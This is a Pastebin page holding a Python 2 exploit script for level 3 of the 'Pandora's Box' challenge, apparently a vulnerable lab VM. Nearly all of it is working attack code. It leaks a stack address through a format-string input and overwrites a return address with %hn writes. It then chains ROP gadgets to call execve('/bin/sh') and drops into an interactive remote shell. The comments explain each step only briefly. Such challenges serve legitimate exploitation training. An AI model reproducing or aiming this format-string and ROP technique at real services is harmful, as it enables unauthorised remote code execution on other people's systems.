Guest User

Pandoras Box level3

a guest
Sep 17th, 2015
1,259
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # A slightly different approach than used here http://jellevergeer.com/pandoras-box-level-3/
  2. #
  3. # This approach is different and avoids dealing the stack cookies
  4. # Enjoy
  5.  
  6. import struct
  7. import socket
  8. import telnetlib
  9.  
  10.  
  11. REMOTE = '192.168.56.101'
  12. # REMOTE = '127.0.0.1'
  13. PORT   = 44101
  14.  
  15. mysocket = socket.socket()
  16. mysocket.connect((REMOTE, PORT))
  17.  
  18. # Obtain a leaked stack address
  19. mysocket.send('9999%08x' + '\n')
  20.  
  21. # Ensure all response data is returned
  22. while True:
  23.     data = mysocket.recv(1024)
  24.     addr_loc = data.find('9999')
  25.     if addr_loc is not -1:
  26.         break
  27.  
  28. addr = data[addr_loc+4:addr_loc+12]
  29. print "leaked stack address is " + addr
  30.  
  31. # Calculate offsets for the return address of the function "start_game"
  32. start_game_addr = int(addr, 16) - 48
  33. print "start_game address is  " + hex(start_game_addr)
  34.  
  35. # Calculate offset for the future "/bin/sh" string sent next
  36. bin_sh_addr = int(addr, 16) + 278
  37. print "bin_sh address is  " + hex(bin_sh_addr)
  38.  
  39. sploit = '9999'
  40.  
  41. sploit += struct.pack('<L', start_game_addr)        # Offsets for 0x080485af (start_game)
  42. # sploit += struct.pack('<L', 0xCCCCCCCC)       # Debug values
  43.  
  44. sploit += struct.pack('<L', start_game_addr + 2)    # Offsets for 0x080485af (start_game+2)
  45. # sploit += struct.pack('<L', 0xDDDDDDDD)       # Debug values
  46.  
  47. # Change return address from start_game to ROP bootstrap
  48. sploit += '%33521x%11$hn'               # 0x080a8308 - add esp,0x10c; ret
  49. sploit += '%34050x%12$hn'               # 0x080a8308 - add esp,0x10c; ret
  50.  
  51. sploit += '\x41' * 0xba                 # Padding because above we moved 0x10c 'up' the stack
  52.  
  53. # Zero eax
  54. sploit += struct.pack('<L', 0x0809807f)         # xor eax,eax; ret
  55.  
  56. # Zero ecx + set ebx with addr of '/bin/sh'
  57. sploit += struct.pack('<L', 0x080540cd)         # pop ecx; pop ebx; ret
  58. sploit += '\x00' * 4 + struct.pack('<L', bin_sh_addr)   # Address of /bin/sh
  59.  
  60. # Zero edx
  61. sploit += struct.pack('<L', 0x080540a6)         # pop edx; ret
  62. sploit += '\x00' * 4                    # set edx to 0
  63.  
  64. # Set eax to 11 (syscall for execve)
  65. # sploit += struct.pack('<L', 0xEEEEEEEE)       # Debug value
  66. sploit += struct.pack('<L', 0x0806ad3e) * 5     # inc eax; inc eax; ret
  67. sploit += struct.pack('<L', 0x0806ad3f)         # inc eax; ret
  68. sploit += struct.pack('<L', 0x08054820)         # int 0x80; ret
  69.  
  70. # And finally the '/bin/sh' string
  71. sploit += '////////////////bin/sh\x00'          # Padding then null terminated '/bin/sh'
  72.  
  73. # Bombs away
  74. mysocket.send(sploit)
  75.  
  76. # Drop into a interactive shell
  77. tn = telnetlib.Telnet()
  78. tn.sock = mysocket
  79. tn.interact()
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×